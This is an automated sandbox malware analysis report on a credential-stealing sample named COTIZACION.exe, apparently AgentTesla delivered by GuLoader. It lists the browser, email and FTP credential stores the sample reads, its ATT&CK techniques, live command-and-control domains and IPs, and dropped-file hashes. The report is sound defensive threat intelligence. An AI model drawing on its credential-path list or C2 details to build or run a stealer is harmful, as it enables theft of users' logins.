            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: COTIZACION.exe PID: 7796, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: COTIZACION.exe PID: 7796, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            11
            Input Capture
            225
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS311
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
            Virtualization/Sandbox Evasion
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSH1
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            COTIZACION.exe63%ReversingLabsWin32.Trojan.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://mail.showpiece.trillennium.biz0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              drive.google.com
              142.250.185.238
              truefalse
                high
                drive.usercontent.google.com
                142.250.185.161
                truefalse
                  high
                  api.ipify.org
                  104.26.12.205
                  truefalse
                    high
                    showpiece.trillennium.biz
                    67.23.226.139
                    truetrue
                      unknown
                      mail.showpiece.trillennium.biz
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://showpiece.trillennium.bizCOTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://drive.usercontent.google.com/HCOTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.google.comCOTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.ipify.orgCOTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://r11.o.lencr.org0#COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://mail.showpiece.trillennium.bizCOTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://drive.google.com/COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/vCOTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://x1.c.lencr.org/0COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://x1.i.lencr.org/0COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.usercontent.google.com/COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://apis.google.comCOTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_Error...COTIZACION.exe, 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000000.00000000.1325260192.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000000.1996163336.0000000000408000.00000002.00000001.01000000.00000003.sdmpfalse
                                                high
                                                https://api.ipify.org/tCOTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCOTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://r11.i.lencr.org/0COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      67.23.226.139
                                                      showpiece.trillennium.bizUnited States
                                                      33182DIMENOCUStrue
                                                      104.26.12.205
                                                      api.ipify.orgUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      142.250.185.161
                                                      drive.usercontent.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      142.250.185.238
                                                      drive.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1549213
                                                      Start date and time:2024-11-05 12:36:20 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 1s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:COTIZACION.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/12@4/4
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 84%
                                                      • Number of executed functions: 140
                                                      • Number of non-executed functions: 17
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: COTIZACION.exe
                                                      TimeTypeDescription
                                                      06:38:38API Interceptor323x Sleep call for process: COTIZACION.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      67.23.226.139Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                              PI 22_8_2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                COTIZACION 19 08 24.exeGet hashmaliciousAgentTeslaBrowse
                                                                  pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                    invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                      SijLVTsunN.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        DHL BILL OF LANDING SHIPPING INVOICE DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                          104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                          • api.ipify.org/
                                                                          perfcc.elfGet hashmaliciousXmrigBrowse
                                                                          • api.ipify.org/
                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                          • api.ipify.org/
                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                          • api.ipify.org/
                                                                          hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          s-part-0017.t-0009.t-msedge.nethttps://outlook.office.com@www.nescini.com/wp-content/uploads/2024/10/JTe86LlZl2-nfET-jEQ0WO-6.htmGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.246.45
                                                                          https://QBE.fmgconnect.co.uk/login?crn=QBE04487166Get hashmaliciousUnknownBrowse
                                                                          • 13.107.246.45
                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                          • 13.107.246.45
                                                                          https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.45
                                                                          2877872483264021301.jsGet hashmaliciousStrela DownloaderBrowse
                                                                          • 13.107.246.45
                                                                          10289118772168318999.jsGet hashmaliciousStrela DownloaderBrowse
                                                                          • 13.107.246.45
                                                                          AWB.exeGet hashmaliciousFormBookBrowse
                                                                          • 13.107.246.45
                                                                          De_posit Confirmati0n_ Mitie.htmlGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.45
                                                                          https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                          • 13.107.246.45
                                                                          https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                                                          • 13.107.246.45
                                                                          api.ipify.orgREVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                          • 104.26.12.205
                                                                          Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 172.67.74.152
                                                                          DB_DHL_AWB_001833022AD.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.74.152
                                                                          Payslip_October_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.12.205
                                                                          CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                          • 104.26.13.205
                                                                          CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                          • 104.26.13.205
                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.74.152
                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.13.205
                                                                          Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                          • 172.67.74.152
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUS3Ri17T8XLh.exeGet hashmaliciousXWormBrowse
                                                                          • 172.67.19.24
                                                                          TEKJ09876545678002.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                          • 188.114.97.3
                                                                          REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          https://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.pepeworld.pro/c2VyZ2lvLmFsdmFyZXpAdG90YWxlbmVyZ2llcy5jb20=&IdTracking=03397&user=964998racking=10419&user=081904Get hashmaliciousPhisherBrowse
                                                                          • 104.17.25.14
                                                                          m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                          • 1.13.123.50
                                                                          https://outlook.office.com@www.nescini.com/wp-content/uploads/2024/10/JTe86LlZl2-nfET-jEQ0WO-6.htmGet hashmaliciousHTMLPhisherBrowse
                                                                          • 172.67.198.39
                                                                          https://QBE.fmgconnect.co.uk/login?crn=QBE04487166Get hashmaliciousUnknownBrowse
                                                                          • 162.247.243.39
                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                          • 172.67.133.135
                                                                          https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          DIMENOCUSQuotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 67.23.226.139
                                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 67.23.226.139
                                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 67.23.226.139
                                                                          https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brGet hashmaliciousHTMLPhisherBrowse
                                                                          • 107.161.183.172
                                                                          http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 107.161.183.172
                                                                          nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                          • 109.73.163.173
                                                                          rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 138.128.178.242
                                                                          bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 98.142.105.97
                                                                          https://docsend.com/view/63jvhxyyj7pwxergGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                          • 64.37.50.172
                                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                          • 199.168.186.114
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0e3Ri17T8XLh.exeGet hashmaliciousXWormBrowse
                                                                          • 104.26.12.205
                                                                          TEKJ09876545678002.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.26.12.205
                                                                          REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.12.205
                                                                          Detalles de la factura_________________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.26.12.205
                                                                          EL GINER.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 104.26.12.205
                                                                          PO_63738373663838____________________________________________________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.26.12.205
                                                                          RFQ#SSM-354459.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.26.12.205
                                                                          Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 104.26.12.205
                                                                          SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.12.205
                                                                          https://de.vour.ioGet hashmaliciousUnknownBrowse
                                                                          • 104.26.12.205
                                                                          37f463bf4616ecd445d4a1937da06e19HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          EL GINER.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          rFactura02Presupuesto_9209Urbia_pdf_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          MSI18A.dllGet hashmaliciousUnknownBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          Request for quotation for the pumps.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          PerceivedFurthermore.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          build.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          att1-241104022450_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 142.250.185.238
                                                                          • 142.250.185.161
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dllQuotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                            1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):12288
                                                                                              Entropy (8bit):5.97694153396788
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                              MD5:D6F54D2CEFDF58836805796F55BFC846
                                                                                              SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                                                                                              SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                                                                                              SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                              • Filename: 1364. 2024.exe, Detection: malicious, Browse
                                                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                              • Filename: Quote_220072.exe, Detection: malicious, Browse
                                                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                              • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                                              • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                                              • Filename: PO-000172483 (2).exe, Detection: malicious, Browse
                                                                                              • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):35
                                                                                              Entropy (8bit):4.264578373902383
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:apWPWPjNLCNHiy:UPRCNHiy
                                                                                              MD5:58AC0B5E1D49D0EE1AED2FE13FAE6C7A
                                                                                              SHA1:02C8384573D47CA39F2E2ACA32B275861EC59A93
                                                                                              SHA-256:624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
                                                                                              SHA-512:8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:[broadspread]..slyngvrk=houghband..
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):489048
                                                                                              Entropy (8bit):1.245615736901525
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
                                                                                              MD5:B4FB425BAF217F31E91AAB39ABF66DCD
                                                                                              SHA1:03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
                                                                                              SHA-256:4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
                                                                                              SHA-512:E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^...........*............................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`....*.........................)1.............q..............4....
                                                                                              Process:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):371
                                                                                              Entropy (8bit):4.247837387326688
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
                                                                                              MD5:46003C65AA12A0EBE55662F0141186DC
                                                                                              SHA1:739652C3375018DAFFB986302A7D3E8D32770B41
                                                                                              SHA-256:2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
                                                                                              SHA-512:59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
